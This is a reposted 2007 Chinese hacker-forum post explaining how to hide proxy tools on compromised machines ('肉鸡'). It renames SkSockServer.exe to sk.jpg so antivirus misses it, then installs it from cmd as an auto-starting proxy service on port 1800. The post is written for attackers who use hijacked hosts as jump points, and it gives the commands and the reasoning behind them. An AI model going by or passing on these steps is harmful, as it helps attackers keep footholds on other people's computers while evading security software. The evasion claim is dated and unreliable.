注册
登录
论坛
搜索
社区银行
帮助
导航
私人消息 (0)
公共消息 (0)
系统消息 (0)
好友消息 (0)
帖子消息 (0)
黑色海岸线论坛
»
网络安全
» 利用Cmd躲过肉鸡防火墙方法
返回列表
发帖
发短消息
加为好友
chinanic
(黑冰cn)
当前离线
巡海头狼
帖子
6440
我的爱好
阅读权限
150
来自
贵州遵义
在线时间
456 小时
总版主
主题
0
积分
854
贝壳
854 个
性别
男
来自
贵州遵义
注册时间
2005-3-26
最后登录
2011-2-26
楼主
跳转到
»
倒序看帖
打印
字体大小:
t
T
chinanic
发表于 2007-5-24 01:48
|
只看该作者
[转载]
利用Cmd躲过肉鸡防火墙方法
因为我在学校上的是教育网。要扫国外的主机需要靠跳板。
但很多软件都已经被列为病毒!
比如:opentelnet,ca等,放到肉鸡上很可能就被杀掉....不爽
连SkSockServer都被列为病毒...郁闷啊!!
经过几次尝试,我想到了一种简单的躲过杀毒软件的方法。那就是更改可执行程序的扩展名。
比如我们可以把SkSockServer.exe更改为sk.jpg
这样的话,杀毒软件就查不出来了。
在直接双击执行更改过扩展名的程序时候,系统便会询问用什么方式打开,也就是说windows也认不出来。
但是我们在cmd命令行中却可以执行。是不是很神奇???而且和没改扩展名的时候效果是一样的。
不同的是,当我们要执行更改了扩展名的程序时候需要打全名(把扩展名也打上)。
下面是我在本机上安装sksockserver(sk.jpg):
A、我们利用没改扩展名的程序:
E:/>SkSockServer -install
拒绝访问。
这时就弹出瑞星的病毒提示,说发现病毒!
下面我们看看改过扩展名的。
E:/>sk.jpg -install
Snake SockProxy Service installed.
E:/>sk.jpg -config port 1800
The Port value have set to 1800
E:/>sk.jpg -config starttype 2
The New StartType have set to 2 -- Auto
E:/>net start skserver
Snake SockProxy Service 服务正在启动 .
Snake SockProxy Service 服务已经启动成功。
ok!成功!
现在我们不怕杀毒软件了!而其他的在命令行执行的程序也可以用这种方法。
我就不一一叙述了。
B、原理
其实原理很简单,我们利用了cmd判断文件类型的方法:
在CMD中,系统首先判断文件的类型是否是执行文件,
判断方法不是文件扩展名,而是文件头的PE段。
如是执行文件,则执行它。
如不是,再根据相应的关联启动相应程序。
如没有输入扩展名,则系统将默认扩展名为BAT,EXE.COM
C、判断
也就是说,程序更改了扩展名后,只有cmd.exe能“认”出它来,
因为cmd不是根据扩展名来判断文件类型的。
而windows是靠扩展名来判断文件类型的.
这样,我们就可以骗过windows和杀毒软件。
收藏
分享
天行健,君子以自强不息
地势坤,君子以厚德载物
黑色海岸线欢迎您
QQ群:7212260
致力于探索WEB技术精髓:http://www.bitechcn.com
点这里加我!
返回列表
回复
发帖
使用交流
网络安全
网络技术
娱乐休闲
灌水乐园
文学天地
美图欣赏
网站办公
站务处理
[收藏此主题]
[关注此主题的新回复]
[通过 QQ、MSN 分享给朋友]